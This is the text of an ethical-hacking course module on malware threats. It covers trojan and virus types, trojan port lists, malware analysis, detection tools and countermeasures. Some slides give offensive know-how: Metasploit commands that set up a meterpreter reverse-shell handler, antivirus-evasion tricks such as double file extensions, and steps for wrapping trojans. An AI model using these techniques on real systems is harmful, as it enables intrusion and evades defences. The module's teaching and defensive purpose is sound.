Ethical Hacking v10 Threats Module 6 – Malware

Ethical Hacking v10 Module 6 – Malware Threats

Malware Threats

Goals• Understand Malware/Malware Propagation

Techniques• Understand Trojan Types/How They Work• Understand Virus Types/How They Work• Understand Computer Worms• Understand Process of Malware Analysis• Understand Malware Detection Techniques• Learn Malware Countermeasures• Understand Malware Penetration Testing

Module 6.0 Malware Threats

• 6.1 Introduction to Malware• 6.2 Trojan Concepts• 6.3 Virus and Worm Concepts• 6.4 Malware Reverse Engineering• 6.5 Malware Detection• 6.6 Countermeasures• 6.7 Anti-malware Software• 6.8 Penetration Testing

6.1 Introduction to Malware

Introduction to Malware

• Malicious software that damages or disables computer systems and gives some control to the malware creator• Theft• Fraud

• Examples:• Trojan Horse• Virus• Backdoor• Worm• Rootkit• Spyware, Ransomware, Botnet, Adware, Crypter

How Malware Gets into Systems

• Instant Messenger application• IRC (Internet Relay Chat)• Removable devices• Attachments• Legitimate software packaged by a disgruntled employee• Browser and email software bugs• NetBIOS (FileSharing)• Fake programs• Untrusted sites and freeware software• Downloading files, games, and screensavers from Internet sites

Common Techniques Attackers Use to Distribute Malware on the Web• Blackhat Search Engine Optimization (SEO)

• Ranking malware pages highly in search results• Malvertising

• Embedding malware in ad-networks that appear on hundreds of legitimate sites• Compromised Legitimate Sites

• Hosing embedded malware that spreads to visitors• Social Engineered Click-jacking

• Tricking user into clicking o innocent-looking pages• Spearphishing Sites

• Impersonating legitimate organizations in an attempt to steal login credentials• Drive-by Dowloads

• Exploiting flaws in browser software to install malware by just visiting a webpage

6.2 Trojan Concepts

How Hackers Use Trojans• Delete or replace operating system’s critical files• Generate DoS attacks• Record screenshots, audio, and video of target computer• Use target computer for spamming, and blasting email messages• Download spyware, adware, and malicious files• Disable firewalls and antivirus software• Create backdoors for remote access• Infect target computer as a proxy server for relay attacks• Use target computer as a botnet to generate DDoS attacks• Steal information including passwords, security codes, credit card

information using keyloggers

Common Ports used by

Trojans

TCP Port Name of Trojan

21 Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx,WinCrash

23 Tiny Telnet Server

25

Antigen, Email Password Sender, HaebuCoceda, Shtrilitz Stealth, Terminator, WinPC, WinSpy, Kuang2 0.17A-0.30

31 Hackers Paradise80 Executor456 Hackers Paradise555 Ini-Killer, Phase Zero, Stealth Spy666 Satanz Backdoor1001 Silencer, WebEx1011 Doly Trojan1170 Psyber Stream Server, Voice

Trojan Ports(cont'd)


1234 Ultors Trojan

1243 SubSeven 1.0 – 1.8

1245 VooDoo Doll

1492 FTP99CMP

1600 Shivka-Burka

1807 SpySender

1981 Shockrave

1999 BackDoor 1.00-1.03

2001 Trojan Cow

2023 Ripper

2115 Bugs

Trojan Ports (cont'd)

TCP Port Name of Trojan2140 Deep Throat, The Invasor2801 Phineas Phucker3024 WinCrash3129 Masters Paradise3150 Deep Throat, The Invasor3700 Portal of Doom4092 WinCrash4567 File Nail 14590 ICQTrojan5000 Bubbel5001 Sockets de Troie5321 Firehotcker


TCP Port Name of Trojan5400 Blade Runner 0.80 Alpha5401 Blade Runner 0.80 Alpha5402 Blade Runner 0.80 Alpha5400 Blade Runner5401 Blade Runner5402 Blade Runner5569 Robo-Hack5742 WinCrash6670 DeepThroat6771 DeepThroat6969 GateCrasher, Priority7000 Remote Grab


TCP Port Name of Trojan7300 NetMonitor7301 NetMonitor7306 NetMonitor7307 NetMonitor7308 NetMonitor7789 ICKiller8787 BackOfrice 20009872 Portal of Doom9873 Portal of Doom9874 Portal of Doom9875 Portal of Doom9989 iNi-Killer


TCP Port Name of Trojan10067 Portal of Doom10167 Portal of Doom10607 Coma 1.0.911000 Senna Spy11223 Progenic trojan12223 Hack´99 KeyLogger12345 GabanBus, NetBus12346 GabanBus, NetBus12361 Whack-a-mole12362 Whack-a-mole16969 Priority20001 Millennium


TCP Port Name of Trojan20034 NetBus 2.0, Beta-NetBus 2.0121544 GirlFriend 1.0, Beta-1.3522222 Prosiak23456 Evil FTP, Ugly FTP26274 Delta30100 NetSphere 1.27a30101 NetSphere 1.27a30102 NetSphere 1.27a31337 Back Orifice31338 Back Orifice, DeepBO31339 NetSpy DK31666 BOWhack


TCP Port Name of Trojan33333 Prosiak34324 BigGluck, TN40412 The Spy40421 Masters Paradise40422 Masters Paradise40423 Masters Paradise40426 Masters Paradise47262 Delta50505 Sockets de Troie50766 Fore53001 Remote Windows Shutdown54321 SchoolBus .69-1.11



61466 Telecommando

65000 Devil

UDP Port Name of Trojan

1349 Back Ofrice DLL

31337 BackOfrice 1.20

31338 DeepBO

54321 BackOfrice 2000

6.3 Trojan Types

Types of Trojans• VNC Trojan• HTTP Trojan• ICMP Trojan• Data Hiding Trojan• Destructive Trojan• HTTPS Trojan• Botnet Trojan• Proxy Server Trojan

• Remote Access Trojan• FTP Trojan• Defacement Trojan• E-banking Trojan• Convert Trojan• Notification Trojan• Mobile Trojan• Command Shell Trojan

Command Shell Trojans• Command shell Trojan gives remote control of the command sheel on

a target computer• Trojan server is installed on the target compute that operates a port

for the attacker to connect• A client is installed on the attacker’s computer that is used to launch a

command shell on the target computer

Defacement Trojans• Resource editors all to view, edit, extract, and replace strings,

bitmaps, logos, and icons from any Windows programs• Allow view and edit of almost any aspect of a compiled Windows

program, including menus, dialog boxes, icons, etc.• Apply User-styled Custom Application (UCA) to deface Window

applications

Botnet Trojans• Botnet Trojans infect a large number of target computers across a

large geographic area to create a network of bots that are controlled through a command and control (C&C) center • Botnets are used to launch attacks on a targets including DoS,

spanning, click fraud, and financial information theft

Botnet Trojans (cont’d)• Tor-based Botnet Trojans – ChewBacca• ChewBacca Trojan has stolen data on 49,000 payment cards from 45 retailers

in 11 countries over a two month span

• Botnet Trojans – Skynet and CyberGate• Skynet - a Tor-powered trojan with DDoS, Bitcoin mining and Banking

capabilities spread through Usenet• CyberGate RAT- a powerful, fully configurable and stable Remote

Administration Tool coded in Delphi that is continuously getting developed by a experienced team• CyberGate RAT was built to be a tool for various possible applications, ranging from

assisting Users with routine maintenance tasks, to remotely monitoring children, captures regular user activities and maintain a backup of your typed data automatically

Proxy Server Trojans• Trojan Proxy is usually a standalone application that allow remote

attacker to use the target computer as a proxy to connect to the Internet• Proxy Server Trojan starts a hidden proxy server on the target

computer• Thousands of computers on the Internet are infected with proxy

servers using this technique

W3bPrOxy Tr0j4nCr34t0r (Funny Name)• W3bPrOxy Tr0j4nCr34t0r is a proxy server Trojan • Supports multi connections from many clients • Reports IP addresses and ports by email to the Trojan owner

FTP Trojans• FTP Trojans install an FTP server on the target computer that opens

FTP ports• An attacker can then connect to the target computer using FTP port

to download any files that exist on the target computer

VNC Trojans• VNC Trojan starts a VNC Server daemon in the target system • Attacker connects to the target using any VNC viewer• VNC is considered a utility which makes the VNC Trojan difficult to

detect• Hesperbot• Hesperbot is a banking Trojan which feature common functionalities,

including keystroke logging, creation of screenshots and video capture, configuring remote proxies• Creates a hidden VNC server for the attacker to connect to the target

remotely• VNC does not log the user off like RDP, therefore the attacker can connect to

the target computer while a user is working

HTTP/HTTPS Trojans• Bypass Firewall• HTTP Trojans can bypass any firewall and work in the reverse way of a straight

HTTP tunnel

• Spawn a Child Program• Executed on the internal host and spawn a child at a scheduled time

• Access the Internet• Child program appears to be a user to the firewall and is allowed to access the

Internet

HTTP Trojan – HTTP RAT• Displays ads, records personal data/keystrokes• Downloads unsolicited files, disables programs/system• Floods Internet connection and distributes threats• Tracks browsing history and activities and hijacks the browser• Makes fraudulent claims about spyware detection and removal

SHTTPD Trojan – HTTPS (SSL)• SHTTPD is a small HTTP Server that can be embedded in any program• Can be wrapped with a legitimate program• When executed it will transform the target computer into an invisible

web server

ICMP Tunneling• Covert channels are methods that an attacker can hide data in a

protocol that is undetectable• Relies on techniques called tunneling that allows one protocol to be

carried over another protocol• ICMP tunneling uses ICMP echo-request and reply to carry a payload

and silently access or control a target computer• Icmpsend

• Client computer – icmpsend <target IP Address>• ICMP Server – icmpserv -install

ICMP Tunneling Example

Remote Access Trojans• Works like remote desktop access• Attacker gains complete graphic user interface (GUI) access to the

target computer remotely• Install• Infect target computer with server.exe• Plant reverse Connecting Trojan• Trojan connect to port 80 to establish the reverse connection• Attacker has complete control over target computer

Remote Access Trojans (cont'd)• Optix Pro• MoSucker• BlackHole RAT• SSH-R.A.T.• njRAT• Xtreme RAT• DarkComet RAT• Pandora RAT• HellSpy RAT

• ProRAT• Theef

Remote Access Tools – Atelier Web Remote Commander• Allows establishment of a remote connection to a remote computer • Doesn’t install any client or supporting software on the computer

Hell Raiser RAT• HellRaiser allows an attacker to gain access to the target computer• Send pictures, popup chat messages, transfer files to and from the

target system• Completely monitor the operations performed on the target

computer

Covert Channel Trojan - CCTT• Cover Channel Tunneling Tool (CCTT) Trojan is equipped with a

number of exploitation techniques creating arbitrary data transfer channels in the data streams authorized by a network access control system• Enables attackers to get an external server shell from within the

internal network and internal to external as well• Sets a TCP/UDP/HTTP CONNECT|POST channel permitting TCP data

streams (SSH, SMTP, POP, etc.) between an external server a device that resides on the internal network

E-banking Trojans• Intercept a target’s banking

account information before it is encrypted • Sends it to the attacker’s Trojan

Command and Control center

• Steals the target’s data including credit card information • transmits it to remote hackers using

email, FTP, IRC, and other methods

Types of E-banking Trojans• TAN Grabber

• Trojan intercepts valid Transaction Authentication Number (TAN) entered by the user• Replaces the TAN with a random number that will be rejected by the bank• Attacker can use the intercepted TAN with the user’s login details

• HTML Injection• Trojan creates fake form fields on e-bank pages• Fields elicit extra information (card number, date of birth, etc.)• Attacker can use to impersonate and compromise target’s account

• Form Grabber• Trojan analyses POST requests and responses to target’s browser• Compromises the scramble pad authentication• Intercepts scramble pad input as user enters Customer Number and Personal Access

Code

E-banking Trojans – ZeuS and SpyEye• The main purpose of ZeuS and SpyEye is to steal bank and credit card

account information, FTP data, and other sensitive information from infected computers using web browsers and protected storage• SpyEye can automatically and quickly initiate online transactions• Additonal E-banking Trojans include Citadel Builder and Ice IX

Destructive Trojans – M4sT3r Trojan• M4sT3r is a very dangerous

and destructive Trojan• When executed it destroys

the operating system• Formats all local and

network drives• The user will no longer be

able to boot the computer

Notification Trojans• Notification Trojans send the location of the target’s IP Address to the

attacker• Whenever the target computer connects to the Internet, the attacker

receives a notification

Data Hiding Trojans (Encrypted Trojans)• Encryption Trojans encrypts data files on the target’s system and

renders information unusable• Written in C++

• Attackers demand a ransom or force the target/s to make purchases from their online drug stores to unlock files• Targets include• Company databases• Personal information• Vital files and folders• Financial information• Confidential documents and information

Data Hiding Trojans (Encrypted Trojans)• Encryption Trojans encrypts data files on the target’s system and

renders information unusable• Written in C++

• Attackers demand a ransom or force the target/s to make purchases from their online drug stores to unlock files• Targets include• Company databases• Personal information• Vital files and folders• Financial information• Confidential documents and information

6.4 Trojan Tools

How to Infect Systems Using a Trojan• Create a new Trojan packet using a Trojan Horse Construction Kit• Create dropper, which is part of a trojanized packet that installs the

malicious code on the target computer• Create a wrapper using wrapper tools to install the Trojan on the

target computer • Propagate the Trojan• Execute the dropper• Execute the damaging program/routine• Major Trojan Attack Paths

• User clicks on the malicious link• User opens malicious email attachments

Wrappers• A wrapper binds a Trojan executable

with an .exe application• That appears to be a game or office

application

• The two programs are wrapped together into a single file• When the user runs the wrapped .exe• It installs Trojan in the background• Then runs the wrapping application in

foreground

Dark Horse Trojan Virus Maker

Crypters• Software that is used by hackers to hide viruses, keyloggers, or tools

of any file to avoid detection by antiviruses• Can encrypt, obfuscate, and manipulate malware• Makes it harder to detect by security programs• Used by cybercriminals to create malware that can bypass security

programs • Presents itself as a harmless program until it gets installed

Types of Crypters

• Static/statistical crypters• Use different stubs to make each encrypted file unique• Having a separate stub for each client makes it easier for malicious actors to

modify or, in hacking terms, “clean” a stub once it has been detected by a security software

• Polymorphic crypters• Considered more advanced• Use state-of-the-art algorithms that utilize random variables, data, keys,

decoders, and so on• One input source file never produces an output file that is identical to the

output of another source file• Crypter services are available online for a reasonable fee ($10 - 100)

Crypter Examples• Msfvenom• AIO FUD Crypter• Hidden Sight Crypter• Galaxy Cryptor• Criogenic Crypter• Heaven Crypter• SwayzCryptor• Aegis Crypter

Creating a Malicious Using MSFVENOM

Exploit Kit• An exploit kit or crimeware toolkit is a platform to deliver exploits and

payloads • Trojans, spywares, backdoors, bots, buffer overflow scripts, etc. on

the target

Creating a Malicious Payload in Metasploit

Set Up Your Exploit Multi Handler

use exploit/multi/handlerset PAYLOAD windows/x64/meterpreter/reverse_tcp

set LHOST <kali IP>

set LPORT 4444

show optionsrun

Infinity• The Infinity Exploit Kit is an exploit kit that uses vulnerabilities in Mozilla

Firefox, Internet Explorer and Opera to install threats on the target computers• Malware analysts have also reported that the Infinity Exploit Kit exploits

known vulnerabilities in Web browser add-ons and platforms like Java and Adobe Flash to carry out its attacks• The Infinity Exploit Kit is used to compromise the target computers and

may be associated with other threats• The Infinity Exploit Kit Will Find and Use Any Vulnerability to Install Threats

on the PC

Other Exploit Kits• Phoenix Exploit Kit• The Phoenix Exploit Kit is a commercial crimeware tool that until fairly

recently was sold by its maker in the underground for a base price of $2,200• It is designed to booby-trap hacked and malicious Web sites so that they

impose drive-by downloads on visitors• Phoenix targets only Microsoft Windows computers

• Blackhole Exploit Kit• BlackHole is commercial crimeware designed to be stitched into hacked or

malicious sites and exploit a variety of Web-browser vulnerabilities for the purposes of installing malware of the customer’s choosing• Once an extremely popular crimeware-as-a-service offering, Blackhole was

for several years responsible for malware infections and stolen banking credentials, and likely contributed to tens of millions of dollars stolen from small to mid-sized businesses

Other Exploit Kits (cont'd)• Bleeding Life• Exploit Pack Run on Java Juice• What’s interesting about this kit is that its authors advertise that one of the

exploits included isn’t really an exploit at all: It’s a social engineering attack where the hacked page will simply abuse built-in Java functionality to ask the visitor to run a malicious Java applet

• Crimepack• A prepackaged bundle of commercial crimeware that attackers can use to

booby-trap hacked Web sites with malicious software• Another Java exploit software

Evading AntiVirus Techniques• Break the Trojan file into multiple pieces and zip into a single file• Always write the Trojan, and embed in an application• Change Trojan’s syntax• Convert .exe to a VB script• Change .exe extension to .doc.exe, .ppt.exe, .pdf.exe as Windows hides file

extension by default

• Change the content of the Trojan using hex editor and also change the checksum and encrypt the file• Never use Trojans downloaded from the web as antiviruses can

detect these with no trouble

6.5 Virus and Worm

Concepts

Introduction to Viruses• A virus is a self-replicating program that produces its own copy by

attaching itself to another program, computer boot sector, or document• Viruses are usually transmitted through file downloads, infected

removable disk drives, flash drives, and email attachments• Virus characteristics• Infects other programs• Alters data• Transforms itself• Corrupts files and programs • Encrypts itself• Self-replicates

The Life of a Virus• Design – a virus is developed using a programming code or

construction kits• Replication – viruses replicate for an amount of time and then

spreads• Launch – virus is activated by the user• Detection – virus is then detected by antivirus software• Incorporation – antivirus software continuously updates its software

to automatically eradicate the virus• Elimination – the threat of that virus is eliminated when users keep

their antivirus software up to date

Working of Viruses• Infection Phase• The virus replicates itself and attaches to an .exe file in the system

• Attack Phase• Viruses are programmed with trigger events to activate and corrupt systems

• Viruses may infect each time they are run• Viruses may run only when predefined conditions occur• Viruses may run on specific days, dates, times, events

Reasoning Behind Creating Viruses• Cause damage to an individual or organization• Receive financial benefits• Used for research projects• Play a trick• Cause vandalism• Perpetrate cyber terrorism• Distribute ideological messages (political, religious, etc.)

Indication of Virus Attack• Abnormal Activities – the system acts in an unusual and unexpected way

• Processes take more time to complete• Computer unresponsive• Drive labels change• Unable to boot operating system• Computer slows down when running normal applications

• False Positives – many glitches can result from viruses, but not all• Many antivirus alerts• Computer freezes periodically• Files and folders are missing• Hard drive accesses increase• Browser window freezes frequently

How Do Computers Become Infected• User/s download or run files from untrusted source• User/s open infected email attachments• User/s install pirated and untrusted applications• User/s do not keep operating system/s applications updated regulary• User/s do not install new versions of plug-ins when directed• User/s do not keep antivirus applications up to date

6.6 Virus Types

Ransomware• Ransomware is a type of malware that restricts access to a target

computer’s files and folders and demands an online ransom payment to the malware creators• Types• Crytorbit Ransomware• CrptoLocker Ransomware• CrptoDefense Ransomware• CryptoWall Ransomware• Police-themed Ransomware

Types of Viruses• System or Boot Sector• File• Cluster• Multipartite• Macro• Stealth/Tunneling• Encryption• Sparse Infector• Add-on

• Polymorphic• Companion/Camouflage• Intrusive• Metamorphic• Shell• Direct Action or Transient• Overwriting File• File Extension• Terminate and Stay Resident (TSR)

System or Boot Sector Viruses• System or Boot Sector Viruses• Boot sector virus moves MBR to another location on the hard disk and

copies itself to the original location of MBR• When the affected system boots, virus code is executed first and then

control is passed to the original MBR

File and Multipartite Viruses• File Viruses• Infects files which are executed or interpreted in the system including .exe,

.sys, .com, prg, .bat, .mnu, .obj, etc.• Can be either direct-action (non-resident) or memory-resident

• Multipartite Viruses• Infect the system boot sector and executable files at the same time.

Macro Viruses• Macro Viruses• Infect files create by Microsoft Word or Excel• Most are written using Visual Basic for Applications (VBA)• Infect templates or convert infected documents into template files, while

appearing normal

Cluster Viruses• Cluster Virusies• Modify directory table entries so that it points users or system processes to

the virus code rather than the actual application• Only one copy of the virus is stored on disk, but infects all applications on

the computer• Will launch itself first when any application on the computer is started after

which control is past to the actual application

Stealth/Tunneling Viruses• Stealth/Tunneling Viruses• Evade the antivirus software by intercepting requests to the operating

system• Is hidden by intercepting the antivirus software’s request to read the file

and passing the request to the virus instead of the operating system• Virus then returns an uninfected version of the file to the antivirus software

that makes it appear clean

Encryption Viruses• Encryption Viruses• Users simple encryption to encipher the code• Is encrypted with a different key for each infected file• The antivirus cannot directly detect them using signature detection

methods

Polymorphic Code• Polymorphic code• Mutates while keeping the original algorithm intact• To enable, the virus must have a polymorphic engine (mutating engine)• When well-written, no parts remain the same on each infection

Metamorphic Viruses• Metamorphic Viruses• Rewrite themselves completely every time they infect a new executable• Metamorphic code can reprogram itself by translating its own code into a

temporary representation and then back to normal code

File Overwriting or Cavity Viruses• File Overwriting or Cavity Viruses• Cavity virus overwrites a part of the host file that is constant, usually with

nulls, without increasing the length of the file and preserving functionality

Sparse Infector Viruses• Sparse Infector Viruses• Infects only occasionally, not every application that is executed• Infects only files that are a certain size• This aids in the virus not be detected

Companion/Camouflage Viruses• Companion/Camouflage Viruses• Is a computer virus that stores itself in a file that is named similar to

another program file that is commonly executed• When that file is executed, the virus will infect the computer or perform

malicious steps such as deleting the files on the user’s computer hard drive

Shell Viruses• Shell Viruses• Infects a computer by wrapping itself around code which already exists,

such as the operating system code which writes to a file• Whenever a program tries to use the enclosed code the virus code is

executed

File Extension Viruses• File Extension Viruses• Change the extensions of files• .txt is safe as it indicates a pure text file• With file extensions turned off a file may appear to be safe, but will not be

• Example: Files.txt could really be File.txt.vbs• Turn off, hide file extensions, in operating system

Add-on and Intrusive Viruses• Add-on viruses• Append their code to the host code without making any changes to the host

code• Inserts code at the beginning of the valid code

• Intrusive viruses• Overwrite the host code partly or completely with the viral code

Transient, Terminate, and Stay Resident Viruses• Transient• Disappears after running

• TSR• Loads itself into memory and stays there

Virus Hoaxes and Fake Antiviruses• Virus Hoaxes• Hoaxes are false alarms claiming reports

about a non-existing virus which may contain virus attachments• Fake warning message propagating to users

not to open a specific email that will damage one’s system

• Fake Antiviruses• Attacker disguise malware as an antivirus and

trick user/s into installing on one’s system• Fake antiviruses damage target systems and

can be consider malware

Computer Worms• Malicious programs that operate across network connections

without the need for human involvement• Most worms replicate and spread across the network to consume

resources• Some worms carry a damaging payload• Worm payloads are often used to install backdoors, turning infected

computers into zombies and creating bobnets

Differences between Virus and Worm• Worms self-replicate, viruses don’t• Worms cannot attach themselves to other programs• Worms use file/information transport features to spread through

infected networks automatically, viruses don’t• Type of worm – Ghost Eye Worm• Worm Maker – Internet Work Maker Thing

6.7 Malware Analysis

Sheep Dip Computer• Sheep dipping is an analysis of incoming messages/files for malware• Sheep dip computers have port, file, and network monitors and

anti-virus software• Sheep dip computers have a strictly controlled connection to the

network

Antivirus Sensor System• Computer software that identifies/analyzes malicious code threats• Used in conjunction with sheep dip computers

Malware Analysis• Preparing test bed by:• Isolating system• Disabling shared folders/guest isolation• Copying malware to guest O/S

Malware Analysis1. Performing static analysis while malware is inactive2. Collect information concerning:• String values found in binary• Packaging/compressing technique

3. Set up network connection and ensure there are no errors4. Run virus and monitor process actions/system information5. Record network traffic information6. Determine which files have been added, which processes have

been spawned, and which registry changes have been made7. Collect information on service requests, DNS information,

incoming/outgoing connection attempts

Online Malware Analysis Services• Anubis: Analyzing Unknown Binaries• Avast! Online Scanner• Malware Protection Center• ThreatExpert• Dr. Web Online Scanners• Metascan Online• Bitdefender QuickScan• UploadMalware.com• Online Malware Scanner• ThreatAnalyzer• VirusTotal

Various Analysis Services• Trojan Analysis• NeverQuest

• Virus Analysis• Ransom Cryptolocker

• Worm Analysis• Darlloz

6.8 Malware Reverse

Engineering

Approaches to Reverse Engineering Malware

• Reverse engineer • use a hex dumper to look for bit patterns• Use disassembler to read executable instructions in text format

• Examine the malware’s exploitation techniques• If the malware obfuscates itself, focus on reverse engineering on ly the new

parts• Look for mistakes in ransomware encryption implementation• Look for command & control activity• Categorization and clustering

• Do broad stroke analysis on bulk samples rather than a deep dive into a single sample

Techniques

• Static analysis• Analyze binaries without actually running them• Look at file metadata, disassemble or decompile the executable

• Dynamic analysis• Run the executable in a sandboxed environment

• Automated analysis• Use automated tools • Be careful that they don’t miss anything!

• Manual analysis• Use if the malware contains anti-debugging routines or anti-analysis

mechanisms

Malware Analysis Tools• Knowledge of Assembly language• Disassembler – IDA Pro• Debugger – OllyDbg, WinDbg• System Monitor – Process Monitor, RegShot. Process Explorer• Network Monitor – TCP View, Wireshark• Packer Identifier – PEID• Unpacking Tools – Qunpack. GUNPacker• Binary Analysis Tools – PE Explorer, Malcode Analysts Pack• Code Analysis Tools – LordPE, ImpRec

IDA Pro Example

6.9 Malware Detection

How to Detect Trojans• Scan for open ports that are suspicious• Scan for startup programs that are suspicious• Scan for running processes that are suspicious• Scan for files/folders that are suspicious• Scan for network activities that are suspicious• Scan for registry entries that are suspicious• Scan for device drivers that are suspicious• Scan for O/S files that have been suspiciously modified• Scan for Windows services that are suspicious• Run a Trojan scanner

Scanning for Suspicious Ports• Trojans open ports that are unused and connect to Trojan handlers• Watch for connections to unknown/suspicious IP addresses

Ports Monitoring Tools• TCPView• CurrPorts

Scanning for Suspicious Services• Trojans make themselves look like valid Windows services or hide

their processes• Some Trojans use PEs to inject into processes• Processes look legitimate and help bypass firewalls• Trojans can hide processes using rootkit methods• Process monitoring tools can be used to identify hidden

backdoors/Trojans

Services Monitoring Tools• Process Explorer• System Explorer• HijackThis• Autoruns for Windows• KillProcess• Security Task Manager• Yet Another (remote) Process Monitor• MONIT• ESET SysInspector• OpManager

HijackThis Example

Scanning for Suspicious Registry Entries• Windows automatically executes instructions in certain registry

sections• Suspicious entries found when conducting registry scan might be

Trojan infection• Trojans inject instructions into certain registry sections to execute

malicious actions

Registry Entries Monitoring Tools• RegScanner• Reg Organizer• Registry Viewer• Comodo Cloud Scanner• Buster Sandbox Analyzer• All-Seeing Eyes• MJ Registry Watcher• Active Registry Monitor• Regshot• Registry Live Watch• Alien Registry Viewer

Scanning for Suspicious Device Drivers• Trojans end up installed along with device drivers from

unknown/untrusted sources• The drivers are used to avoid detection• Scan all drivers to ensure they are trusted/genuine

Device Drivers Monitoring Tools• DriverView• Driver Detective• Unknown Device Identifier• DriverGuide Toolkit• InstalledDriversList• Driver Magician• Driver Reviver• ServiWin• Double Driver• My Drivers• DriverEasy

Scanning for Suspicious Windows Services• Trojans that spawn Windows services allow attackers to control

virtual machine/send malicious instructions remotely• Trojans rename all malicious processes to look genuine• Trojans use rootkit techniques to manipulate certain registry keys to

hide processes

Windows Services Monitoring Tools• Windows Service Manager

(SrvMan)• SMART Utility• Netwrix Service Monitor• PC Services Optimizer• ServiWin• Windows Service Manager Tray• AnVir Task Manager• Process Hacker• Free Windows Service Monitor

Tool• Nagios XI• Service+

Scanning for Suspicious Startup Programs• Check registry for startup program entries• Check locally automated device drivers• Check boot.ini• Check automatically started Windows services• Check the startup folder

Suspicious Startup Program Tools• Security AutoRun• Autoruns for Windows• ActiveStartup• StartEd Pro• Startup Delayer• Startup Manager• PCTuneUp Free Startup Manager• Disable Startup• WinPatrol• Chameleon Startup Manager• Startup Booster

Scanning for Suspicious Files and Folders• Trojans generally modify the files/folders of a system• Tools to identify changes in the system include:• SIGVERIF• FCIV• TRIPWIRE

File and Folder Integrity Checkers• FastSum• WinMD5• Advanced CheckSum Verifier (ACSV)• Fsum Frontend• Verisys• Another File Integrity Checker (AFICK)• FileVerifier++• PA File Sight• CSP File Integrity Checker• ExactFile• OSSEC• Checksum Verifier

Scanning for Suspicious Network Activities• Trojans send sensitive information to attackers by connecting back

to the handler• Network scanners/packet sniffers can monitor traffic to malicious

remote address• Tools like Capsa can monitor traffic for suspicious activity via the

web• Capsa is a network analyzer that gives detailed information on

potential Trojan activities

6.10 Malware Countermeasures

Trojan Countermeasures• Do not open email attachments from unknown senders• Ensure patches/security updates are installed• Ensure unnecessary ports at host firewall are blocked• Conduct antivirus scan of all DVDs/CDs• Do not accept programs via IM• Ensure desktop permissions are restricted

Trojan Countermeasures (cont’d)• Ensure weak default configurations settings are hardened and

unused functions are disabled• Do not blindly type commands or use pre-made scripts/programs• Ensure internal traffic is monitored for encrypted traffic/unusual

ports• Ensure the file integrity of each workstation is consistently managed• Do not download/execute apps from untrusted sources• Regularly run host-based anti-virus, intrusion detection, and firewall

software

Backdoor Countermeasures• Majority of commercial antivirus software can scan for/detect

backdoor programs• Ensure users know not to install apps from untrusted sources• Ensure use of anti-virus tools to identify/eliminate backdoor

programs

Virus and Worms Countermeasures• Ensure installation of anti-virus software that identifies/eliminates

infections as soon as they appear• Follow all instructions with downloading programs/files from

Internet• Ensure an anti-virus policy is in place and all staff has it• Do not open attachments from unknown senders• Ensure anti-virus software is regularly updated• Ensure regular scans of all drives are conducted• Ensure regular backup of data• Check all programs/disks with updated anti-virus before using

Virus and Worms Countermeasures (cont’d)• Ensure approval of all executable code received by organization• Ensure disk cleanup, defragmentation, and registry scanner are run

weekly• Avoid booting machine with an infected boot disk• Ensure firewall is on when using O/S in Windows XP• Keep updated on latest virus threats• Ensure anti-spyware/adware is run weekly• Ensure all CDs/DVDs are checked for infection• Avoid opening files that have multiple types of file extensions• Turn on popup blocker and use an Internet firewall• Take extra care with files received via IM

Anti-Trojan Software• TrojanHunter• Emsisoft Anti-Malware• Anit Malware BOClean• Anti Hacker• XoftSpySE• SPYWAREfighter• Malwarebytes Anti-Malware

Premium• SUPERAntiSpyware

• Trojan Remover• Twister Antivirus• STOPzilla AnitMalware• ZeroSpyware

Antivirus Tools• Immunet• AVG Antivirus• BitDefender• Kaspersky Anti-Virus• Trend Micro Titanium Maximum Security• Norton AntiVirus• F-Secure Anti-Virus• avast! Pro Antivirus 2014• McAfee AntiVirus Plus 2014• ESET Smart Security 7• Total Defense Internet Security Suite

6.11 Malware Penetration

Testing

Pen Testing for Trojans and Backdoors• Scanning for open ports• Scanning for Processes that are running• Scanning for entries in the registry• Scanning for installation of device drivers• Scanning for Windows services• Scanning for startup programs• Scanning for files/folders• Scanning for activities on the network• Scanning for O/S file modification• Running Trojan Scanner• Documenting findings

Pen Testing for Trojans and Backdoors (cont’d)• When a Trojan is found:• Isolating machine from the network• Update and run anti-virus or use another anti-virus program

Pen Testing for Viruses• Testing for suspicious behavior in a system• Is anti-virus installed?• Is anti-virus updated?• Is real-time scanning enabled?

• Scanning for running processes• Scanning for changes to registry entries• Checking Windows services• Checking startup programs• Checking integrity of files/folders• Checking modification of O/S files

Pen Testing for Viruses (cont’d)• When suspicious activity is found:• Ensuring system isolation• Running anti-virus in safe mode

• When a virus is found:• Installing a different anti-virus program• Scanning a second time for system viruses

• When a virus is found:• Formatting system with clean copy of O/S• Documenting findings

Malware Threats Review

• Malware is malicious software that disables/damages computer systems

• Trojan is a program that hides malicious code inside seemingly normal data/programming

• A Trojan executable is bound to .EXE apps using a wrapper

• An exploit/crimeware kit delivers exploits/payload to target system

• A virus is a self-replicating program• A worm is a more advanced type of virus that

does not need to be attached to another file• Viruses are categorized based on what/how they

infect• Best defense against Trojans/viruses is

awareness/prevention• Use anti-Trojan/anti-virus tools to

identify/eliminate Trojans/viruses

Lab 6: Malware Threats

Documents

Ethical Hacking v10 Threats Module 6 – Malware